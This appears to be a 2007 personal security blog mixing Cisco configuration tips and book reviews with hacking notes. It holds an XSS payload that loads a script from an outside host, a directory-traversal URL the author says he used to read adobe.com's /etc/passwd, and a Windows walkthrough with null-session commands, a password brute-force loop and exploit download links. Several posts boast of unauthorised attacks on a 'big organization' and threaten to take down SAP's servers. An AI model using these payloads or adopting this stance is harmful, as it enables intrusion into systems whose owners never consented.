
Try this at your own risk, COKE Machine hacked!!

I was checking PDP's hack on citrix and i stumble across a coke machine hack. Well, i am not sure if this is an old exploit or if it is still working as of today or it is patched. However, i could not replicate this hack on a vending machine here. Maybe it is of a different model or different system or different chipset. Whatever it is, this is a cool one. Simple yet effective.



The Hacka Man

Sunday, October 7, 2007

Just another XSS

Well, i am getting tired of your site "big organization". PoC shown with screenshots of your site being XSS numerous times. Just patch up quick and you will be alright. Hire me or get someone to do the job. What ever you decide, wish you good luck and all the best.



The Hacka Man

Saturday, October 6, 2007

Preventation is better than Cure

With over 6 years of experience in penetration tests of all sorts of systems from networks to web applications to databases to many others more, I can say that i have successfully achieve my goals as "hacker" or a white hat. As usual, i am constantly keeping myself abreast of the lastest exploits and hacking methodology. I am not really a true researcher, but however a guy who loves to read all sorts hacking books or articles.

Well, with the recent work i am doing on web applications, i can say that most web applications are truly not secure and hackable, except for a few out there. It all boils down to the developers and the customers. Those customers have no idea of how secure programming is so important. Once they are hacked, their reputation is gone and data is lost. From what i see, customers are always eager to launch their application online maybe because of certain time frame they have to meet or maybe because they are eager to let the consumers know more about their services and products, but they did not think about security on their applications as a whole. Well, i would advise them to think twice and think about the possibility of being hacked hard time. Below are a few guidelines that i got from Jeremiah's whitepaper that after reading it, i feel that it is important to embrace it, rather than treating it just like another whitepaper.

Secure Code: Application developers must consider security
from the beginning. Involve the security staff early in the
process.

QA Development: Experienced staff must perform periodic
security as well as usability reviews.

Stay up-to-date on patches and configured securely.

Continuous assessments: Covering both technical and logical
issues on the production web site as its being changed.

Also, for those who are paranoid about your web applications and have no budgets to spent, you guys should install an Web Application Firewall like ModSecurity to shield off most of the attacks and moreover, it is customizable where you can add your own ruleset. There are also a few open source WAF like PHP-IDS for XSS, URLSCAN for IIS and some others. Commercial ones are available too. It all depends on how much you can spend and what do you really need.

The Hacka Man

Friday, October 5, 2007

Another hole????

Hey "big organization", need no explaination. You have been owned again. Well i am smart not to let you see the actual url string, else you will secure yourself? Still call me a script kiddie?? Think harder. Challenge me?? Why not do something to your site rather than challenging people here and there? Need to know the actual payload and url string? Call me. You are lucky i didn't use xss to portscan your internal network or cause a defacement and make you look like a fool. Respect others and respect yourself.



The Hacka Man

Thursday, October 4, 2007

You are OwNED!!!

Hey "big organization", I don't think i need to prove too much. Check out your logs or something. Check out whatever you have. I just spend roughly around 5 minutes on your site and i got what i want. Well, i don't think you worth my precious time doing good for your site. This is just a simple test. I can do more damaging stuff, but well I don't see the point of doing more damage. I don't have to prove no more. Take this shit from me and do your part. Peace.



The Hacka Man

Wednesday, October 3, 2007

Challenge me on Web Application Security???

One day after the application penetration test, i was contacted by an huge organization who apparently view/read my blog. Basically they issue a challenge to test on my knowledge and skills on web application security assessment. Well, i don't really care or bother how huge you organization is, i accept your challenge and i will show you that your public facing website will be used as a zombie for unidentified attacks. Don't blame me for that. You issue a challenge and i responded. I don't have anything to prove, except that i would love to see how good is your web security.

The Hacka Man

Tuesday, October 2, 2007

Sessionn ID Manipulation?????

So today is the last day for Phase 1 for my application penetest. Well, its always funny because its always during the last day that i will find something. In my previous posts, i was saying that the application is very secure. However, i found some session IDs manipulation that allows an attacker to impersonate someone. Well although its not high risk, but think of this situation. Lets say you and your friend is at a school compound or somewhere with network access and suddenly your friend is checking his account. With the mindset of a hacker, you know that by manipulating the session ID will allow you to gain access to his account, while he says that he wants to go to the toilet and forgets to logout, you quickly grab his session id and then change his password. From there on, you can monitor his account's transaction and status and moreover you can transfer money to your own account. I mean there is too many possibility. This is just one of the scenarios. You can let your imagination run wild and can come up with more evil stuff. However i just want to point out that since that application is already so secure, why not take another step to tighten this hole? Agree?????

The Hacka Man

Monday, October 1, 2007

Owning Axis IP Cameras

Over the weekend, i had the time to review a whitepaper written by both Adrian Pastor and Amir Azam. In that article, they displayed certain XSS techniques that allowed an attacker to own the IP cameras and monitor it. Well, i would say that this is not too bad of an article as the PoC included. It is still the same old XSS that is doing the trick and CSRF that allows creation of admin accounts. The firmware for Axis is just crap. They should brush up on their security to avoid more security issues. For those who are interested, do check it out at

http://www.gnucitizen.org/blog/owning-big-brother-hollywood-style-exploits-included


The Hacka Man

2 Factor Authentication Last Update

I think i am more or less done with my scope of work. There is simply no chance in hell that i can break that application. It like no matter what i entered, i always get a service not available or please try again later. Verified all the injection points and the stuffs that i can inject. Still, nothing can be done. The application is so sensitive and secure that it validates all input characters and escape all output characters. Lastly, every error message that is output is all generic error message with no other information. The only one last thing i am trying now is XSS on a 404 error page and see how it reacts. Still, this is what i got



And the generated source i got after the XSS:

[404 Not Found
Not Found
The requested URL /x/--><script>alert("XSS")</script><!--&node=465600 was not found on this server.]

The Hacka Man

Sunday, September 30, 2007

Have you download your scancode?

I was reading on Shreeraj's article about source code review and it was overall a basic yet simple article on source code reviewing. Basically in the article, he teaches the audience from dependency determination to mitigation and countermeasures of a web application. On top of it, he included a tool where he coded himself called "scancode" which is used to scan source codes for potential entry point for XSS and SQLi. This is a must read for those who wants to know more about source code reviewing process and methoddology. Download scancode at page 3 of the article, right at the bottom.

http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html

These days, i am so involved with application security and neglected on the networking area. Well, i am trying to shift myself slowly away from the technical side of things and wish to involve more in business and development stuff. However, still i will keep myself abreast of the latest stuff that is going around in the security world.

The Hacka Man

Adobe Directory Traversal???????

The other night Christ1an showed me a link of Adobe.com with directory traversal. It was an old exploit, however it works on Adobe. This showed how Adobe is not taking application security seriously. Well, i managed to saw the entire /etc/passwd file and DAMN!! i did not take a screen shot of it. I was too careless and excited not to take a screenshot. The following day, the issue was resolved with reports being made to Adobe. Well check out the exploit here that was used against Adobe:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd

Add a null byte character at the end of passwd. Please note that the exploit will not work anymore. However, this is the actual string i used few nights ago.

The Hacka Man

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as the hashmaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing, however i am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hashing string into the form, and the program will fetch the hashing algorithm used. This is rather useful. Because once you know the hashing algorithm, you can then use cracking software to crack for the actual passwords. Well, good work Rsnake, you actually made my job easier!

http://ha.ckers.org/hashmaster

The Hacka Man

Friday, September 28, 2007

Can Your Machine Be Hacked?

Last night, i received an email from Rich Mclver and he gave me a link to publish. Basically, in his post, he provide users with ideas of how to secure holes in your PC. There are 12 tests and all of which gave an rough idea of how to secure your machine. Well, i would say it is a good start for those who wants to start learning about security overall. Check it out:

http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/

The Hacka Man

Thursday, September 27, 2007

Blueinfy.com

Want to know more about Web 2.0 hacking?
Want to have free Web 2.0 auditing tools and articles?
Want to know more about web security and hacking?

You will have to check out Blueinfy.com, it is definitely a site worth visiting. With great in depth articles to simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj.Shah, an ex employee of Foundstone USA. Google him and you will know how powerful is he:)

The Hacka Man

XSS on a vendors website

I am still testing on the application for flaws. However, it is so secure that i can't do a single thing. In the end, i end up testing a vendors site for XSS. The vendor did a good job of escaping < and > characters and it gave me <SCRIPT>alert(2)</SCRIPT> when i view the source code. I was dejected as i knew there is something more i can do. A few minutes later, .mario was online and i told him about my problem. Immediatedly, he came up with a trick that allows XSS to happen. So in the end, i entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into the one of the form fields and when i view the source code, it was totally injected! This was what it displayed on the source code

[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]

Thank you .mario, you helped me understand XSS a lot more.

The Hacka Man

Tuesday, September 25, 2007

2 Factor Authentication Update

I don't believe this, i can't basically do a SQL injection, CSRF or XSS! Everything i wanted to do is basically either encrypted or if i injection a simple character like ", it says service unavailable. This application can be considered very secure it terms of encryption and of good standard if weighing it against the OWASP top ten. Even if i enter a value like 10, this value will be encrypted with this:

Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tU

I am running outta ideas, tell me what more can i do??

The Hacka Man

2 Factor Authentication Day 2

Damn, its getting tough! Have you guys seen a 6 digit password with an encrypted
string this long?

ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120

Well, there is nothing more i can do? I dunno, still thinking:?????

The Hacka Man

Monday, September 24, 2007

2 Factor Authentication?

Well, if you guys asked me if why i havent been updating my blog? I can only say that there is so much to be done in work and of course reading a lot on Rsnake's XSS exploit and defence. Been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions.

Well back to the main topic, i had been assigned to hack an application with 2 factor authentication. Damn, all i can say is it is very secure it terms of randomness in session id, hidden fields and encryption. There is no way i can break the application's login page and the only thing i found is only a jar file with lotsa class files inside. Well, i know i can use a java decompiler like jad to get the source code but i did not because i am concentrating more on finding vulnerabilities. Hmz....I will continue with part 2 tomorrow. Firefox is a very cool tool to do web hacking. Install the following extentions guys

1. DOM Inspector
2. LiveHTTP Headers
3. Tamper Data
4. Modify Header
5. Firebug
6. Greasemonkey with XSS Assistant and Post Intercepter

The Hacka Man

Monday, September 3, 2007

Sam, Wireless Hacking, Updates

Its been a long time since i last updated my blog. I had been so busy these days with my current job. From planning to hacking. Also, i had been reading on Rsnake's and Jeremiah's book on XSS Exploit and Defence. It is a good book with great examples, however, there are some parts that i don't quite understand and i am still trying to catch up. Well, Sam, if you are reading this, check out this url below for your wireless audit.

http://www.leetupload.com/tutorials/hackingspoonfed/part1

The Hacka Man

Saturday, August 11, 2007

PHP Application Firewall?

I was discussing with Christ1an recently about application firewall and he actually presented me an application firewall written by pdp and maintained by .mario , which to me is very impressive. I actually looked at the source code and i must say that i don't understand a single shit. However, it was a nice effort from Christ1an and guys devoting their time to develop a php application firewall. I am network guy, i do web audit, but i am not good in coding or programming or source code review. Well, i am still learning, i want Christ1an on my team as i think he will be a very good addition to the company. Hey Christ1an, if you read this, please holla at me alright? I want to chat with you about career opportunities, you know how to reach me. Also, for guys who wants a SQLI cheat sheet, check this out:

http://ha.ckers.org/sqlinjection

http://ferruh.mavituna.com/makale/sql-injection-cheatsheet

Check out the PHPIDS Team's IDS and their XSS database

http://php-ids.org

http://www.gnucitizen.org/xssdb/application.htm

The Hacka Man

Thursday, August 9, 2007

Cisco IOS 12.3T onwards with Tool Command Language

I was again reading ioshints blog for cisco tricks. I must say he is the master of Cisco products and configuration. I was reading about tclsh and i must say it is very handy as i can write scripts and store it remotely, NVRAM or in the flash. Well, below are a few links that you can learn the basics of tclsh scripting.

http://ioshints.blogspot.com/2007/05/ios-tclsh-resources.html

http://ioshints.blogspot.com/2007/08/example-tcl-script-with-command-line.html



The Hacka Man

Tuesday, August 7, 2007

Exploiting FTP clients using PASV command

Finally, i am back home to Singapore again. I am so happy and my mood starts to brighten again. I was researching about web security and i came across Wade Alcorn's website. He found out that it was possible to launch a reverse shell and own a Asterisk server using inter-protocol Exploitation. Also, check out BeEF, which is equivalent to Metasploit type of framework for web applications. Lastly, do check out the FTP PASV command manipulation which allows FTP servers to cause vulnerable FTP clients to connect to other hosts.

"The paper discusses how the FTP client flaw in detail and demonstrates how it can be used to attack common web browsers such as Konqueror, Opera and Firefox. Proof of concept code is presented that extends existing JavaScript port-scanning techniques to scan any TCP port from Firefox (even though it now implements "port banning" restrictions)."

http://www.bindshell.net/papers/ftppasv

The Hacka Man

Sunday, August 5, 2007

Michael Lynn Cisco IOS reverse shell exposed?

I was reading articles and looking at how Michael Lynn's exploit works in the 2005 blackhat. Nothing can be found as the code was not leaked out nor anyone knows much actual exploit. I was determined and i found something that relates to heap overflow in Cisco IOS. I think its something similiar to Michael Lynn's exploit using the IOS check_heaps() function. For more, check it out here: http://www.irmplc.com/content/pdfs/Cisco_IOS_Exploitation_Techniques.pdf
The Hacka Man

Attribute-Based XSS and Verifying if your webmail account is Hacked!

These days, i am just plain lazy. Maybe it is due to the mood that i am going back to Singapore or maybe i am just depressed with certain issues here. But whatever it is, i am still doing a lot of researching and penetration testing work. Its been a long time since i last visited Jeremiah's blog. Today, i just went through his blog and discover two interesting topic that catch my eye. One is a new XSS vector known as Attribut-Based Cross-Site Scripting and How to check if your WebMail account has been hacked (Redux). Check it out at http://jeremiahgrossman.blogspot.com. He described a way of how to find out a hacker had hacked into your webmail, how the new XSS vector worked and how to prevent it. It is ab absolutely must read for all webappsec ppl.

The Hacka Man

Friday, July 27, 2007

Basic Cisco Switches Auditing Guidelines

1. Always use VLAN to create collision domain to limit broadcast traffic. Remember that VLAN1 is the admin VLAN which is used for administrative purposes and avoid using VLAN1 to prevent hackers from plugging into unused ports to communicate with the rest of the network.

2. Avoid using autotrunking mode. Dynamic Trunking Protocol allows VLAN-Hopping attacks where hackers are able to communicate in various VLANs. Assign trunk interface to the native VLAN other than VLAN 1

3. Make sure Spanning Tree Protocol is mitigated from attacks. Enable portfast, bpdufiler, bpduguard, and root guard on the switches.

4. Disable all unused ports on the switch to prevent hackers from plugging into unused ports to communicate with the rest of the network.

5. Turn off VLAN Trunking Protocol if not in used. If required, VTP should be used with passwords enabled.

6. Review the network or configuration to limit thresholds for multicast and broadcast traffic on switch ports.

The Hacka Man

Wednesday, July 25, 2007

Remote Command Exec (FireFox 2.0.0.5)

These days, i am reading about web applications hacking and trying out several different stuffs. I happen to stumble across xs-sniper's page and read about his post on owning most major browsers. It appears that there is a problem with Cross Application Browser Scripting where a flaw in the URI handling behavior allows for remote command execution. Be sure to check out his post below:

http://xs-sniper.com/blog/remote-command-exec-firefox-2005/

The Hacka Man

Thursday, July 19, 2007

Thanks Chr1stian, Google Store flaw?

The other night i was talking to Chr1stian about XSS and google. We were chatting and suddenly the topic got more and more interesting. But anyway, Chr1stian is really a kind soul and a nice nice person to talk with. He taught me a lot of things which i don't understand and guide me slowy with each steps. Thank you Chr1stian for your patience, I can say that now i understand at least 90% of what you taught me. Also, we were talking about how security doesn't make money to flaws in google to google did not correct most of them holes that were reported by him.

I am sure that if i got a chance to test the google application, i will find more flaws, however because of my work schedule, i don't really have the time to play around. Anyway, i still wanna say thanks to Chr1stian, don't forget our deal. :)

The Hacka Man

Tuesday, July 17, 2007

The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws

Sorry for the lack of updates. Recently, i had been reading a lot of books about web hacking and RFID and neglected blogging. Its due to work nature that i have to report what i do everyday. However, just yesterday, I had a small chat with the author of the famous burp proxy and realised that he published a book call "The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws". According to him, this was what he said "Our book aims to be the most comprehensive and deep guide to hacking web applications available. It covers numerous advanced topics like blind SQL/other injection, obscure logic flaws, attacking multi-stage authentication, new attacks against webusers, ViewState tampering, decompilation of thick client components, source code review, use of bespoke automation, and many more." As usual, i would always buy books to read and this one is not to be missed. If someone can guarantee me that his book is good, with experience in developing tools and giving talks in blackhat, then i will spend that kind of money in buying his books. Well, let me know what you guys think?



The Hacka Man

Wednesday, July 4, 2007

IPSec VPN in PIX/ASA

For those of you who wants to setup an IPSec VPN connection in the PIX/ASA firewall, below is a snaphot of the commands of how to do it.

crypto ipsec transform-set hacker esp-aes-256 esp-sha-hmac
crypto dynamic-map dynmap 20 set transform-set hacker
crypto map hacker 10 ipsec-isakmp
crypto map hacker 10 match address IPSEC_hackers
crypto map hacker 10 set peer 111.111.111.111
crypto map hacker 10 set transform-set hackerZ
crypto map hacker 20 ipsec-isakmp dynamic dynmap
crypto map hacker client authentication LOCAL
crypto map hacker interface outside
isakmp enable outside
isakmp key ******** address 111.111.111.111 netmask 255.255.255.255 no-xauth no-config-mode
isakmp identity address
isakmp nat-traversal 20
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption aes-256
isakmp policy 10 hash sha
isakmp policy 10 group 1
isakmp policy 10 lifetime 86400
isakmp policy 20 authentication pre-share
isakmp policy 20 encryption 3des
isakmp policy 20 hash md5
isakmp policy 20 group 2
isakmp policy 20 lifetime 86400
vpngroup crm525gp address-pool vpnpool
vpngroup crm525gp idle-time 1800
vpngroup crm525gp max-time 86400
vpngroup crm525gp password ********
vpngroup helpgrp address-pool vpnpool2
vpngroup helpgrp idle-time 1800
vpngroup helpgrp max-time 86400
vpngroup helpgrp password ********

The Hacka Man

DNS Pinning Exposed

Christ1an wrote a very detailed article on Anti anti anti DNS Pinning or you can call it DNS pinning. For those who are still confused or still find it complicated to understand, this article actually explained it with a step by step approach with pictures attached. In it he mentioned the whole dns pinning issues and how it actually works to attack a web browser. Check it out here: http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html

The Hacka Man

Monday, July 2, 2007

VoIP article ready soon

I am in the midst of writing my VoIP article for hakin9 magazine and frankly speaking i am very restless these days. Still, i force myself to quickly write this article, so it can be publish soon for those VoIP auditors to give a comment, or for anyone who is interested in auditing VoIP services. Well, this article is easy to understand and it is not going to be tough to learn the techniques described. For a beginner, you will find this a useful yet interesting article and for a expert, this is not for you. I plan to write a more in depth and advance article in future if i have the resources and time. I will keep you guys updated on the status once it is published.

The Hacka Man

Friday, June 29, 2007

Youtube's 40+ security vulnerabilities

The other night i was chatting with Chris1an about web security and i just happen to realised that he was actually the one who killed Youtube. Some of you might have already knew that he was the one who discovered around 40+ vulnerabilities in Youtube and became famous overnight. Anyway Christ1an is based in Germany and he is only a student, but hack, he is a guru in web security. He was being interviewed by the register and google actually thanked him for his work.

Recently Christ1an launched http://planet-websecurity.org/ with the intention to bring together similarly themed news and rants related to Web security and to display them in one place. Visit his blog on the right side of my feed or check it out here.

The Hacka Man

Thursday, June 28, 2007

SAP

I always wanted to work for SAP because they pay huge money. I remembered i was being interviewed by SAP back in Singapore. During the first interview, it took me at least 1-2 hours of conversation and i passed the interview. The HR invited me for a second interview, however this time, the interviewer is crap. He asked all sorts of questions and i succintly answered them without beating around the bush. Its either he didnt get what i am trying to say or he is just plain talkative. I entrench strong to my roots for what i said and he did not believe me and saying that i am a pefect candidate for the position and looks like what they are searching for. ALL BLOODY CRAP!!!! A bunch of liars. They truly antagonize me and i loathe them for that. I am a straight person, if you don't wish to hire me, thats fine, just tell me straight and i will understand. Don't have to setup a bunch of stories and be a coward.

Well, good luck to you SAP. If i have a chance to audit your system, i promise i will bring down all your SAP/R3 servers and other external servers you have. Better protect your RFC or you will be OWNED!

The Hacka Man

Wednesday, June 27, 2007

Cisco show mem vs show processes memory sorted

For me to check the router or firewall cpu usage and the memory usage, i always issue the show mem or show processes cpu to see what is causing the router to have a high CPU or memomry utilization. However, i realised that the show mem command output is not as nice as it seemed to be. I was looking at ioshints blog and found out the same command with a little tweaks here and there. This command provides a better output than show mem which is very important for troubleshooting purposes. See below:

show processes memory sorted

show processes cpu sorted 1min

show processes cpu sorted 7min

From cisco:

http://www.cisco.com/warp/public/63/showproc_cpu.html

http://www.cisco.com/warp/public/63/highcpu.html

For Cisco and Juniper command:

http://networking.ringofsaturn.com/Cisco/ciscojuniper.php

Tuesday, June 26, 2007

Designing and Implementing Linux Firewalls with QoS using netfilter, iproute2, NAT and l7-filter

I was invited by Lucian to review this book. Lucian actually sent me a copy of this book for me to read and i was happy upon receiving it. Well, i am someone who loves firewall and security stuff especially linux and cisco. This book is absolutely amazing. For beginners, there are a lot of technical configuration you can read and learn and for experts, this book will guide you to some topic that might interest you. I would really want to put this book into practice, but however base on my current situation, i will only have the time to read and understand the concept. I would highly rate this book a 4.5/5 and anyone who wants to learn firewall at a low level.

VoIPong installation error

For those of you who try to install VoIPong and have installation errors like the ones below, the problem and solution are provided as shown below:

Murat Balaban writes:

>
> Hi Henrique,
>
> Which UNIX user is trying to run voipong? It seems a non-root
> user is running it, but does not have the sufficient privileges
> to open the ethernet device in promisc mode.
>
> Plus, you seem to have problems with the permissions of
> your modules directory. That directory should be owned by
> the same user running voipong.
>
> Thursday, May 31, 2007, 8:41:56 PM, you wrote:
>
> > Release 2.0, running on DINP70759 [Linux 2.4.25-klg #1
> > SMP Ter Abr 6 09:28:24 BRT 2004 i686]
>
> > (c) Murat Balaban http://www.enderunix.org/
> > 31/05/07 14:34:14: EnderUNIX VOIPONG Voice Over IP
> > Sniffer starting...
> > 31/05/07 14:34:14: Release 2.0 running on DINP70759
> > [Linux 2.4.25-klg #1 SMP Ter Abr 6 09:28:24 BRT 2004
> > i686]. (c) Murat Balaban http://www.enderunix.org/
> > [pid: 669]
> > 31/05/07 14:34:14: Default matching algorithm: lfp
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcma.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcmu.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: loaded 0 module(s)
> > 31/05/07 14:34:14: libpcap start failure:
> > pcap_open_live: SIOCGIFHWADDR: No such device
>
> > 31/05/07 14:34:14: PID 669 [parent: 653]: exited with
> > code: 1. uptime: .
>
I had the same problems and i had solved it using this command
sudo chown -R root:root /usr/local/etc/voipong/modules/modvocoder_pcm*
Also for the voipongnets, i created the file by
touch /usr/local/etc/voipong/voipongnets
This will solve the error below.

Monday, June 25, 2007

Snom phones web interface exposed to public.

I was just researching on hard and soft phones and i came across Snom VoIP phones. I don't know much about the phones, however a simple google dorking gave me a bad result. Default installations of the phone is not password protected. Check it out:

"(e.g. 0114930398330)" snom


Sunday, June 24, 2007

Hakin9 X Hackathology

This past week, i was invited by hakin9 magazine to write an article about the lastest hacking skills. I am still thinking about a topic to write. There are different types of hacks and i am in a dilemma in choosing one. After pondering for sometime, i think i would love to write hacks about VoIP. Personally, because VoIP is a subset of network security, i think its best to write something that i am good at. I had already setup a PBX server and now its up to the guys at hakin9. The hakin9 team is a bunch of really cool and nice guys. They gave me a free copy of their magazine and once my article is published, they will also send me a copy of the published issue. I will keep you guys updated on this. Let me know what you guys think?

Friday, June 22, 2007

David Litchfield new Oracle book

I had been wanting to learn more about Oracle hacking and i would not say i am not really good in Oracle Security. I managed to setup a Oracle Database server and do some simple exploitation and auditing, however i know that for me to be good in that aspect, it would require to focus most of my time trying to exploit and learn the techniques to hacking the database. This past week, it had came to my attention that David Litchfield(Oracle Security Guru, google him up to find out more) had published a book called Oracle Hacker's Handbook. I highly recommend anyone who loves Oracle Security to purchase this book. Although i had not lay my hands on this book, it will soon be on my bookshelves.

Monday, June 18, 2007

Using ftp with CUTCP telnet

Check out CUTCP

"Telnet is a program used to interactively log in to a remote computer. CUTCP telnet is a program that runs on a PC and is used in CIRCA labs and elsewhere on campus to log in to remote computers. This program can also function as an ftp server when you are logged in to a remote host. This means that you can use the host's ftp client to connect back to yourself. Here's how you do it:

1) First use telnet to log in to the remote host.

2) Press Alt/T. This will generate an ftp command with the proper network address and start the ftp client program on the interactive host.

3) When it asks for a name, enter anything.

4) When it asks for a password, press Alt/W. This will provide a hidden password to authenticate the connection.

Remember that when you have completed this connection, your PC is an ftp server, and the interactive host is running an ftp client. To transfer a file from the interactive host to your PC, use the put command. To transfer a file from the PC to the interactive host, use the get command."

Sunday, June 17, 2007

Regular Expressions with Cisco IOS

I was reaading some cisco stuffs today and i knew long ago that Cisco IOS allows regular expression for simplification of search task and other uses. Well, back then i did not research much on it but i just came across 2 sites which provides more explaination with regards to Cisco IOS regex.

http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/ftersv_c/ftsappx/tcfaapre.htm

http://www.nil.com/ipcorner/EnhanceIOSUI/

Saturday, June 16, 2007

Cisco Router's DNS server to kill browser advertisement

I just happen to stumble across ioshints blog. He mentioned something about the cisco router's dns server having a way to prevent unwanted website advertisement. You guys can read more at: http://www.nil.com/ipcorner/RouterDNS/

Hacking Old Skoolz Windows

Port 135 (client-server communications)

Port 139, 445 (authentication and file sharing)

Port 137,138 (NetBIOS browser, name and lookup functions)



Look for port 135 endpoint mapping which includes, Microsoft Outlook, Exchange and Messenger Service.


Nmap server to look for port 135

Run rpcscan or epdump on server over port tcp or udp port 135

If udp port 1028, 1029 opened or tcp port 1025 opened, run rpcscan over those ports

Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac for both LSA and SAMR interface respectively. Can be found on all Windows NT OS using name pipes accessible through SMB session over TCP port 139 or 445.

Run walksam query if SMAR interface is present to glean user information.

Run rpcclient from backtrack if a valid username and password is given. LSARPC interface must be present

Compromise admin password using brute force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify if server is vulnerable for RPC DCOM exploits. If patch MS03-026 and MS03-039 is applied, nothing can be done. Else download exploits from

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/


DCOM interface can be exploited through:

TCP and UDP port 135 (through RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)
Use kaHt2 to exploit a remote shell
Use SPKIE msrpcfuzz fuzzer to do stress test.


-----------------------------------------------------------------------------------------

NetBIOS Name Service UDP port 137

Dumping NetBIOS table: Nbtstat –A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
CARAA <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
CARAA <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered

MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

<00> unique hostname
<00> group domain name
<03> unique Messenger service running for that computer
<03> unique Messenger service running for that individual logged in user
<20> unique Server service running
<1D> group Master browser name for the subnet
<1B> unique Domain master browser name, identifies PDC for that domain
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661


NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556


NetBIOS Session Service TCP port 139

Connect through null session:

net use \\192.168.1.152\IPC$ “” /user:””
net view \\192.168.1.152
Use tools like enum, GetAcct and winfo to enumerate more info.


Brute force user password through NetBIOS session service with tools like SMBCrack and SMB-AT or use Windows LOOP to find password.

1. Create a file credentials.txt with username and password:

Password Username
“” Administrator
Password Administrator
Admin Administrator

2. FOR /F “tokens=1,2*” %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

